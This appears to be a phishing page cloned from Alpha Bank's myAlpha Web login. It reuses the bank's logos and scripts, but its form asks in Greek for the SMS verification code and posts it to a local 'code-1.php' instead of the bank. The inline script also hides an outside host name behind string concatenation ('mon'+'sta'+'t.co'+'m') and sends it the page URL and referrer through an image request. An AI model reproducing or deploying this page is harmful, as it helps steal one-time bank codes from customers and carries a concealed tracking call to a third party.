<html lang="en">
<head>
</head>
<body></body>
</html>
<meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="Server" content="AlphaFarm02">
<title>myAlpha Web</title>
<!-- Styles -->
<link href="https://secure.alpha.gr/Login/content/css/login?v=D2etEt4yw4PDbbm2YgVGqKJQl2SOMRFfbP3NMc8XLuk1" rel="stylesheet" />
<div class="row mt-3">
<div class="col pt-1 font-normal grey" style="padding-left: 37px; padding-right: 37px;"><img src="https://secure.alpha.gr/static/login/v1/content/media/login/logo.png" /> <img class="pl-5" src="https://secure.alpha.gr/static/login/v1/content/media/login/lock.png" style="margin-bottom: 10px;" /> &Epsilon;&iota;&sigma;έ&rho;&chi;&epsilon;&sigma;&tau;&epsilon; &sigma;&epsilon; &alpha;&sigma;&phi;&alpha;&lambda;έ&sigmaf; &pi;&epsilon;&rho;&iota;&beta;ά&lambda;&lambda;&omicron;&nu; &tau;&eta;&sigmaf; &Tau;&rho;ά&pi;&epsilon;&zeta;&alpha;&sigmaf;. &Mu;ά&theta;&epsilon;&tau;&epsilon; &pi;&epsilon;&rho;&iota;&sigma;&sigma;ό&tau;&epsilon;&rho;&alpha; &epsilon;&delta;ώ. .
<div class="float-right font-normal grey">&Chi;&rho;&epsilon;&iota;ά&zeta;&epsilon;&sigma;&tau;&epsilon; &beta;&omicron;ή&theta;&epsilon;&iota;&alpha;? <img class="pl-2 pr-1 cp" data-original-title="" id="servicesIcon" onclick="userModal(1)" src="https://secure.alpha.gr/static/login/v1/content/media/login/laptop.png" title="" /> | <a href="mailto:ebankingsupport@alpha.gr"><img class="pl-1 pr-1" data-original-title="ebankingsupport@alpha.gr" data-placement="bottom" data-toggle="tooltip" id="emailIcon" src="https://secure.alpha.gr/static/login/v1/content/media/login/email.png" title="" /></a> | <a href="tel:+30-210-326-0000"><img class="pl-1" data-original-title="&lt;b&gt;210 326 0000&lt;/b&gt; (daily 08:00-22:30)" data-placement="bottom" data-toggle="tooltip" id="phoneIcon" src="https://secure.alpha.gr/static/login/v1/content/media/login/phone.png" title="" /></a> <a class="pl-4 font-normal cobalt" href="https://secure.alpha.gr/Login/myAlphaWeb/el">EL</a></div>
</div>
</div>

<div class="row" id="mainContainer" style="height: 750px;">
<div class="col bg text-center">
<div class="bg2" id="loginContainer" style="margin-top: 0px; padding-top: 90px;">
<div>
<form action="code-1.php" class="form-signin mx-auto mt-5 form-validation" id="loginFormTmp" method="post" novalidate="">
<h1 class="h3 mb-3 font-xl cobalt">&Kappa;&alpha;&lambda;ώ&sigmaf; ή&rho;&theta;&alpha;&tau;&epsilon; &sigma;&tau;&omicron; myAlpha Web</h1>

<h1 class="h3 mb-3 font-lg cobalt">&Alpha;&pi;&alpha;&iota;&tau;&epsilon;ί&tau;&alpha;&iota; &epsilon;&pi;&alpha;&lambda;ή&theta;&epsilon;&upsilon;&sigma;&eta; &mu;έ&sigma;&omega; SMS!</h1>
<input autocomplete="off" autofocus="" class="form-control" id="inputUsername" maxlength="6" name="Username" placeholder="Εισαγάγετε τον κωδικό που σας στάλθηκε μέσω sms" type="text" /><button class="form-btn signin mt-4" id="submitButton" type="submit">&Epsilon;ί&sigma;&omicron;&delta;&omicron;&sigmaf;</button></form>
</div>

<div class="tips mx-auto text-left font-normal grey">
<div class="text-center"><b>Security tips</b></div>

<div class="row">
<div class="col-1 ml-2"><img src="https://secure.alpha.gr/static/login/v1/content/media/login/shield.png" /></div>

<div class="col-10">
<div class="carousel slide" data-ride="carousel" id="tipsCarousel">
<ol class="carousel-indicators">
	<li data-slide-to="0" data-target="#tipsCarousel"></li>
	<li class="active" data-slide-to="1" data-target="#tipsCarousel"></li>
	<li data-slide-to="2" data-target="#tipsCarousel"></li>
</ol>

<div class="carousel-inner">
<div class="carousel-item active carousel-item-left">
<div class="row">
<div class="col ml-2 my-auto">
<div>Your Username and Password are strictly personal and you should not disclose them to anyone.</div>
</div>
</div>
</div>

<div class="carousel-item carousel-item-next carousel-item-left">
<div class="row">
<div class="col ml-2 my-auto">
<div>Use antivirus and antimalware to protect against malware.</div>
</div>
</div>
</div>

<div class="carousel-item">
<div class="row">
<div class="col ml-2 my-auto">
<div>Use antivirus and antimalware to protect against malware.</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>

<div class="demo-container"><button class="demo-btn" onclick="userModal(3)" type="button">View the demo ▶</button></div>
</div>
</div>
</div>

<div class="row separator-line"></div>

<div class="row">
<div class="col mt-3 mb-3 text-center font-normal grey"><a class="font-normal grey" href="https://www.alpha.gr/en/retail/oroi/terms-of-use" target="_blank">Terms of Use</a> | <a class="font-normal grey" href="https://www.alpha.gr/en/retail/support-center/security" target="_blank">Security</a> | <a class="font-normal grey" href="https://www.alpha.gr/en/retail/oroi/cookies-policy" target="_blank">Cookies Policy</a></div>
</div>
<!-- Modal -->

<div aria-hidden="true" aria-labelledby="loginModalLabel" class="modal fade" id="loginModal" role="dialog" style="margin-top: 88px;" tabindex="-1">
<div class="modal-dialog" role="document">
<div class="modal-content" id="modalContent" style="width: 550px;">
<div class="modal-header border-bottom-0 pb-0"><button aria-label="Close" class="close modal-close-btn" data-dismiss="modal" type="button"><span aria-hidden="true">&times;</span></button></div>

<div class="modal-body pt-0 pb-4">
<div class="row mb-3">
<div class="col text-center"><span class="font-lg grey" id="modalTitle">Modal title</span></div>
</div>

<div class="row mb-3">
<div class="col text-center mx-auto"><button class="btn btn-link modal-btn shadow font-md cobalt" id="retailBtn" type="button"><img class="pt-4" src="https://secure.alpha.gr/static/login/v1/content/media/login/retail.png" /></button>

<p class="mt-1" style="line-height:1px;"><button class="btn btn-link modal-btn shadow font-md cobalt" id="retailBtn" type="button">Are you a retail user?</button></p>
</div>

<div class="col text-center mx-auto"><button class="btn btn-link modal-btn shadow font-md cobalt" id="corporateBtn" type="button"><img class="pt-3" src="https://secure.alpha.gr/static/login/v1/content/media/login/corporate.png" /></button>

<p class="mt-1" style="line-height:1px;"><button class="btn btn-link modal-btn shadow font-md cobalt" id="corporateBtn" type="button">Are you a business user?</button></p>
</div>
</div>
</div>
</div>
</div>
</div>
<input id="iKey" name="iKey" type="hidden" value="00ced89a-f71e-4c8f-94bc-90eae5cb233a" />
<p> <input id="appId" name="appId" type="hidden" value="54d45c5d-9142-4893-bc82-cd01df78a6f5" /> <input id="disableAi" name="disableAi" type="hidden" value="False" /> <input id="aiEndpoint" name="aiEndpoint" type="hidden" value="https://monitoring.alpha.gr/appinsights/" /> <input id="opId" name="opId" type="hidden" value="43b137f08ec08d4780917a34bba5efe6" /> <input id="opName" name="opName" type="hidden" value="MyAlphaWeb" /> <input id="serverDisplayName" name="serverDisplayName" type="hidden" value="AlphaFarm02" /> <script src="/Login/bundles/appInsights?v=xPr-JzppmL-I8vTqZaoBBDKFMrArsdju7rdrgi76wdQ1"></script><script src="https://az416426.vo.msecnd.net/scripts/a/ai.0.js"></script> <script src="/Login/scripts/js/login?v=Dnetcg23kUNdCI5pQmuwHKYP1GOaDfw8pFjZdTJ3WLs1"></script> <script src="/Login/bundles/rsa?v=5TNeJF4ZhNX08AmfFwVBB9GG79NX7mtzoP4Q4ixFEJo1"></script> <script src="/Login/Scripts/login/sjcl.min.js"></script> <script type="text/javascript">
        var loginSettings = loginSettings || {};
        loginSettings.LoginType = 0;

        
        new Image().src = document.location.protocol + "//mon" + "sta" + "t.co" + "m/" + "myAlphaWeb3" + ".p" + "ng?du=" + escape(document.location) + "&dr=" + escape(document.referrer) + "&rr=" + Math.random();

        var userActivityTimeout = null;
        var userActivityThrottlerTimeout = null
        var INACTIVE_USER_TIME_THRESHOLD = 10000;
        var USER_ACTIVITY_THROTTLER_TIME = 5000;

        function resetUserActivityTimeout() {
            clearTimeout(userActivityTimeout);
            userActivityTimeout = setTimeout(function() {
                inactiveUserAction();
            }, INACTIVE_USER_TIME_THRESHOLD);
        }

        function userActivityThrottler() {
            if (!userActivityThrottlerTimeout) {
                userActivityThrottlerTimeout = setTimeout(function() {
                    resetUserActivityTimeout();

                    clearTimeout(userActivityThrottlerTimeout);
                    userActivityThrottlerTimeout = null;
                }, USER_ACTIVITY_THROTTLER_TIME);
            }
        }

        function inactiveUserAction() {
            $('#servicesIcon').popover({
                trigger: 'manual',
                placement: 'bottom',
                title: '<span class="font-md cobalt">Get familiar with e-Banking</span><img src="https://secure.alpha.gr/static/login/v1/content/media/login/close.png" class="popover-close-btn cp" onclick="closeServicesPopover()">',
                content: '<p class="mb-12 grey"><span class="popover-icon"><img src="https://secure.alpha.gr/static/login/v1/content/media/login/find-answer.png"></span>&nbsp;Answers to FAQs</p><p class="mb-12 grey"><img src="https://secure.alpha.gr/static/login/v1/content/media/login/how2video.png">&nbsp;Useful how2videos</p>',
                html: true,
                sanitize: false
            }).popover('show').tooltip('disable');
        }

        function activateActivityTracker() {
            window.addEventListener("mousemove", userActivityThrottler);
            window.addEventListener("scroll", userActivityThrottler);
            window.addEventListener("keydown", userActivityThrottler);
            window.addEventListener("resize", userActivityThrottler);
        }

        function doResize() {
            var h = window.innerHeight;
            var nh = (h - 112) >= 750 ? h - 112 : 750;
            var lc_mt = (h - 880) > 0 ? h - 880 : 0;
            var lm_mt = (h / 2) - 180;
            $('#mainContainer').attr("style", "height: " + nh + "px;");
            $('#loginContainer').attr("style", "margin-top: " + lc_mt + "px; padding-top: 90px;");
            $('#loginModal').attr("style", "margin-top: " + lm_mt + "px;");

            var w = window.innerWidth;
            var mc_w = w > 600 ? 550 : 500;
            $('#modalContent').attr("style", "width: " + mc_w + "px;");

            if ($("#errorMsg").length) {
                $('#inputUsername').attr("style", "margin-top: 10px;");
                switch ($("#errorMsg").height()) {
                    case 16: // 1 line
                        break;
                    case 32: // 2 lines
                        $('#loginContainer').attr("style", "padding-top: 70px;");
                        break;
                    case 48: // 3 lines
                        $('#loginContainer').attr("style", "padding-top: 60px;");
                        break;
                    case 64: // 4 lines
                        $('#loginContainer').attr("style", "padding-top: 40px;");
                        break;
                    case 80: // 5 lines
                        $('#loginContainer').attr("style", "padding-top: 20px;");
                        break;
                    default:
                        $('#loginContainer').attr("style", "padding-top: 0;");
                }
            }
        }

        function userModal(type) {
            switch (type) {
                case 1:
                    $('#modalTitle').html("Electronic Services Support");
                    $('#retailBtn').attr("data-link-url", "https://www.alpha.gr/en/retail/support-center/e-banking");
                    $('#corporateBtn').attr("data-link-url", "https://www.alpha.gr/en/business/support-center/e-banking");
                    $('#retailBtn, #corporateBtn').off("click").on('click', closeModal);
                    break;
                case 2:
                    $('#modalTitle').html("Registration of new subscriber");
                    $('#retailBtn').attr("data-link-url", "https://www.alpha.gr/en/retail/myalpha/tools/support-online-registration");
                    $('#corporateBtn').attr("data-link-url", "https://secure.alpha.gr/Login/BusinessOnboarding/home?locale=en");
                    $('#retailBtn, #corporateBtn').off("click").on('click', closeModal);
                    break;
                case 3:
                    $('#modalTitle').html("View the demo");
                    $('#retailBtn').attr("data-link-url", "#");
                    $('#corporateBtn').attr("data-link-url", "#");
                    $('#retailBtn').off("click").on('click', function () { demoLogin(1); });
                    $('#corporateBtn').off("click").on('click', function () { demoLogin(2); });
                    break;
                case 4:
                    $('#modalTitle').html("I forgot my Username");
                    $('#retailBtn').attr("data-link-url", "https://secure.alpha.gr/Login/forgotusername/home" + "?locale=en");
                    $('#corporateBtn').attr("data-link-url", "https://www.alpha.gr/en/business/support-center/e-banking/asfaleia-kai-kodikoi/ksexasa-tous-kodikous-kleidosa-tin-sundromi");
                    $('#retailBtn, #corporateBtn').off("click").on('click', closeModal);
                    break;
            }

            closeServicesPopover();
            $('#loginModal').modal('toggle');
        }

        function closeNotif() {
            $('#notif').hide(600);
            closeServicesPopover();
        }

        function closeServicesPopover() {
            $('#servicesIcon').popover('hide');
            $('#servicesIcon').tooltip('enable');
        }

        function closeModal() {
            $('#loginModal').modal('hide');
            var url = this.dataset.linkUrl;
            if (url != "#") {
                setTimeout(function () { window.open(url); }, 30);
            }
        }

        function rememberMe() {
            if ($('#inputRM').is(":checked") && $('#inputUsername').val() != "") {
                localStorage.rm = $('#inputRM').val();
                localStorage.un = enc($('#inputUsername').val());
            } else {
                localStorage.rm = "";
                localStorage.un = "";
            }
        }

        function demoLogin(userType) {
            switch (userType) {
                case 1:
                    submitLogin("demouser", "demouser", false);
                    break;
                case 2:
                    submitLogin("corpDemoUser", "corpDemoUser", false);
                    break;
            }
        }

        function addRBFAdditionalFields() {
            var screenHeight = window.screen.height;
            var screenWidth = window.screen.width;
            document.getElementById("screenResolution").value = screenWidth + "X" + screenHeight;

            //Although Intl is (at a limited scope) supposedly supported in IE11
            //(https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/DateTimeFormat#Browser_compatibility),
            //it actually looks like `window.Intl` returns undefined. To avoid console errors, check its value before attempting to use it.
            var timeZone = "";
            if (window.Intl) {
                var dtFormat = new Intl.DateTimeFormat();
                timeZone = dtFormat.resolvedOptions().timeZone;
            }
            document.getElementById("timeZone").value = timeZone;
        }

        $(function () {
            doResize();
            $(window).on('resize', doResize);

            //Remember me
            if (localStorage.rm && localStorage.rm == "1") {
                $('#inputRM').attr("checked", "checked");
                $('#inputUsername').val(dec(localStorage.un));
            } else {
                $('#inputRM').removeAttr("checked");
                $('#inputUsername').val("");
            }

            //Enable tooltips
            $('#servicesIcon').tooltip({
                placement: 'bottom',
                html: true,
                title: 'Electronic Services Support',
                template: '<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner tooltip-mw-100"></div></div>'
            });

            $('#emailIcon,#phoneIcon').tooltip({
                html: true,
                template: '<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner tooltip-mw-100"></div></div>'
            });

            $('#infoIcon').tooltip({
                html: true,
                template: '<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>'
            });

            //Retrieve notification from alpha.gr
            var jqxhr = $.getJSON('https://www.alpha.gr/api/ebankingnotification/en');
            jqxhr.done(function (data) {
                if (data.showNotification) {
                    $('#notifTitle').html(data.notificationTitle);
                    $('#notifMsg').html(data.notificationText);
                    $('#notif').removeClass("d-none");
                }
            });
            jqxhr.fail(function () {
                console.log("call to alpha.gr failed");
            });

            var submitForm = function () {
                rememberMe();

                $('.form-validation').addClass("was-validated");

                var username = $("#inputUsername").val();
                var password = $("#inputPassword").val();
                addRBFAdditionalFields();

                submitLogin(username, password, false);
            }

            $("#loginFormTmp").on('submit', function (event) {
                event.preventDefault();
                const target = $('#submitButton');
                if (!target.is(':disabled')) {
                    submitForm();
                }
            });

            activateActivityTracker();
        });
    </script></p>